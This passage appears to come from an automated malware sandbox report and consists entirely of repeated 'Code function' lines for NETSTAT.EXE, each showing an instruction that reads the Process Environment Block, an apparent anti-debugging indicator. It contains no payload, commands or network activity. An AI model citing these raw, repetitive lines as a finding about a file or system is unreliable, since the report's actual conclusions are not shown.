          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EDBE9 mov eax, dword ptr fs:[00000030h]8_2_038EDBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]8_2_038F03E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]8_2_038F03E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]8_2_038F03E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]8_2_038F03E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]8_2_038F03E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]8_2_038F03E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA70E mov eax, dword ptr fs:[00000030h]8_2_038FA70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA70E mov eax, dword ptr fs:[00000030h]8_2_038FA70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398131B mov eax, dword ptr fs:[00000030h]8_2_0398131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FF10 mov eax, dword ptr fs:[00000030h]8_2_0395FF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FF10 mov eax, dword ptr fs:[00000030h]8_2_0395FF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399070D mov eax, dword ptr fs:[00000030h]8_2_0399070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399070D mov eax, dword ptr fs:[00000030h]8_2_0399070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EF716 mov eax, dword ptr fs:[00000030h]8_2_038EF716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C4F2E mov eax, dword ptr fs:[00000030h]8_2_038C4F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C4F2E mov eax, dword ptr fs:[00000030h]8_2_038C4F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FE730 mov eax, dword ptr fs:[00000030h]8_2_038FE730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998B58 mov eax, dword ptr fs:[00000030h]8_2_03998B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CDB40 mov eax, dword ptr fs:[00000030h]8_2_038CDB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DEF40 mov eax, dword ptr fs:[00000030h]8_2_038DEF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CF358 mov eax, dword ptr fs:[00000030h]8_2_038CF358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CDB60 mov ecx, dword ptr fs:[00000030h]8_2_038CDB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DFF60 mov eax, dword ptr fs:[00000030h]8_2_038DFF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998F6A mov eax, dword ptr fs:[00000030h]8_2_03998F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F3B7A mov eax, dword ptr fs:[00000030h]8_2_038F3B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F3B7A mov eax, dword ptr fs:[00000030h]8_2_038F3B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FE87 mov eax, dword ptr fs:[00000030h]8_2_0395FE87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FD294 mov eax, dword ptr fs:[00000030h]8_2_038FD294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FD294 mov eax, dword ptr fs:[00000030h]8_2_038FD294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]8_2_038C52A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]8_2_038C52A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]8_2_038C52A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]8_2_038C52A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]8_2_038C52A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039446A7 mov eax, dword ptr fs:[00000030h]8_2_039446A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]8_2_03990EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]8_2_03990EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]8_2_03990EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DAAB0 mov eax, dword ptr fs:[00000030h]8_2_038DAAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DAAB0 mov eax, dword ptr fs:[00000030h]8_2_038DAAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFAB0 mov eax, dword ptr fs:[00000030h]8_2_038FFAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F36CC mov eax, dword ptr fs:[00000030h]8_2_038F36CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2ACB mov eax, dword ptr fs:[00000030h]8_2_038F2ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998ED6 mov eax, dword ptr fs:[00000030h]8_2_03998ED6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397FEC0 mov eax, dword ptr fs:[00000030h]8_2_0397FEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03908EC7 mov eax, dword ptr fs:[00000030h]8_2_03908EC7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2AE4 mov eax, dword ptr fs:[00000030h]8_2_038F2AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F16E0 mov ecx, dword ptr fs:[00000030h]8_2_038F16E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D76E2 mov eax, dword ptr fs:[00000030h]8_2_038D76E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D8A0A mov eax, dword ptr fs:[00000030h]8_2_038D8A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]8_2_038CC600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]8_2_038CC600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]8_2_038CC600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F8E00 mov eax, dword ptr fs:[00000030h]8_2_038F8E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981608 mov eax, dword ptr fs:[00000030h]8_2_03981608
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E3A1C mov eax, dword ptr fs:[00000030h]8_2_038E3A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA61C mov eax, dword ptr fs:[00000030h]8_2_038FA61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA61C mov eax, dword ptr fs:[00000030h]8_2_038FA61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAA16 mov eax, dword ptr fs:[00000030h]8_2_038CAA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAA16 mov eax, dword ptr fs:[00000030h]8_2_038CAA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]8_2_038C5210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov ecx, dword ptr fs:[00000030h]8_2_038C5210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]8_2_038C5210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]8_2_038C5210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397FE3F mov eax, dword ptr fs:[00000030h]8_2_0397FE3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CE620 mov eax, dword ptr fs:[00000030h]8_2_038CE620
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03904A2C mov eax, dword ptr fs:[00000030h]8_2_03904A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03904A2C mov eax, dword ptr fs:[00000030h]8_2_03904A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03954257 mov eax, dword ptr fs:[00000030h]8_2_03954257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]8_2_038C9240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]8_2_038C9240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]8_2_038C9240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]8_2_038C9240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]8_2_038D7E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]8_2_038D7E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]8_2_038D7E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]8_2_038D7E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]8_2_038D7E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]8_2_038D7E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398EA55 mov eax, dword ptr fs:[00000030h]8_2_0398EA55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398AE44 mov eax, dword ptr fs:[00000030h]8_2_0398AE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398AE44 mov eax, dword ptr fs:[00000030h]8_2_0398AE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D766D mov eax, dword ptr fs:[00000030h]8_2_038D766D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390927A mov eax, dword ptr fs:[00000030h]8_2_0390927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397B260 mov eax, dword ptr fs:[00000030h]8_2_0397B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397B260 mov eax, dword ptr fs:[00000030h]8_2_0397B260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998A62 mov eax, dword ptr fs:[00000030h]8_2_03998A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]8_2_038EAE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]8_2_038EAE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]8_2_038EAE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]8_2_038EAE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]8_2_038EAE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]8_2_038C2D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]8_2_038C2D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]8_2_038C2D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]8_2_038C2D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]8_2_038C2D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA185 mov eax, dword ptr fs:[00000030h]8_2_038FA185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC182 mov eax, dword ptr fs:[00000030h]8_2_038EC182
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFD9B mov eax, dword ptr fs:[00000030h]8_2_038FFD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFD9B mov eax, dword ptr fs:[00000030h]8_2_038FFD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2990 mov eax, dword ptr fs:[00000030h]8_2_038F2990
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]8_2_039451BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]8_2_039451BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]8_2_039451BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]8_2_039451BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F35A1 mov eax, dword ptr fs:[00000030h]8_2_038F35A1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F61A0 mov eax, dword ptr fs:[00000030h]8_2_038F61A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F61A0 mov eax, dword ptr fs:[00000030h]8_2_038F61A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039469A6 mov eax, dword ptr fs:[00000030h]8_2_039469A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039905AC mov eax, dword ptr fs:[00000030h]8_2_039905AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039905AC mov eax, dword ptr fs:[00000030h]8_2_039905AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]8_2_038F1DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]8_2_038F1DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]8_2_038F1DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]8_2_03946DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]8_2_03946DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]8_2_03946DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov ecx, dword ptr fs:[00000030h]8_2_03946DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]8_2_03946DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]8_2_03946DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03978DF1 mov eax, dword ptr fs:[00000030h]8_2_03978DF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]8_2_038CB1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]8_2_038CB1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]8_2_038CB1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0 mov eax, dword ptr fs:[00000030h]8_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0 mov eax, dword ptr fs:[00000030h]8_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]8_2_0398FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]8_2_0398FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]8_2_0398FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]8_2_0398FDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039541E8 mov eax, dword ptr fs:[00000030h]8_2_039541E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]8_2_038C9100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]8_2_038C9100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]8_2_038C9100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398E539 mov eax, dword ptr fs:[00000030h]8_2_0398E539
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0394A537 mov eax, dword ptr fs:[00000030h]8_2_0394A537
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998D34 mov eax, dword ptr fs:[00000030h]8_2_03998D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov ecx, dword ptr fs:[00000030h]8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]8_2_038F4D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]8_2_038F4D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]8_2_038F4D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F513A mov eax, dword ptr fs:[00000030h]8_2_038F513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F513A mov eax, dword ptr fs:[00000030h]8_2_038F513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]8_2_038D3D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAD30 mov eax, dword ptr fs:[00000030h]8_2_038CAD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EB944 mov eax, dword ptr fs:[00000030h]8_2_038EB944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EB944 mov eax, dword ptr fs:[00000030h]8_2_038EB944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03903D43 mov eax, dword ptr fs:[00000030h]8_2_03903D43
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943540 mov eax, dword ptr fs:[00000030h]8_2_03943540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E7D50 mov eax, dword ptr fs:[00000030h]8_2_038E7D50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC962 mov eax, dword ptr fs:[00000030h]8_2_038CC962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC577 mov eax, dword ptr fs:[00000030h]8_2_038EC577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC577 mov eax, dword ptr fs:[00000030h]8_2_038EC577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB171 mov eax, dword ptr fs:[00000030h]8_2_038CB171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB171 mov eax, dword ptr fs:[00000030h]8_2_038CB171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9080 mov eax, dword ptr fs:[00000030h]8_2_038C9080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943884 mov eax, dword ptr fs:[00000030h]8_2_03943884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943884 mov eax, dword ptr fs:[00000030h]8_2_03943884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D849B mov eax, dword ptr fs:[00000030h]8_2_038D849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0 mov eax, dword ptr fs:[00000030h]8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FF0BF mov ecx, dword ptr fs:[00000030h]8_2_038FF0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FF0BF mov eax, dword ptr fs:[00000030h]8_2_038FF0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FF0BF mov eax, dword ptr fs:[00000030h]8_2_038FF0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039090AF mov eax, dword ptr fs:[00000030h]8_2_039090AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]8_2_0395B8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0395B8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]8_2_0395B8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]8_2_0395B8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]8_2_0395B8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395B8D0 mov eax, dword ptr fs:[00000030h]8_2_0395B8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998CD6 mov eax, dword ptr fs:[00000030h]8_2_03998CD6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C58EC mov eax, dword ptr fs:[00000030h]8_2_038C58EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039814FB mov eax, dword ptr fs:[00000030h]8_2_039814FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]8_2_03946CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]8_2_03946CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946CF0 mov eax, dword ptr fs:[00000030h]8_2_03946CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]8_2_03947016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]8_2_03947016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947016 mov eax, dword ptr fs:[00000030h]8_2_03947016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03994015 mov eax, dword ptr fs:[00000030h]8_2_03994015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03994015 mov eax, dword ptr fs:[00000030h]8_2_03994015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]8_2_0399740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]8_2_0399740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399740D mov eax, dword ptr fs:[00000030h]8_2_0399740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]8_2_03981C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981C06 mov eax, dword ptr fs:[00000030h]8_2_03981C06
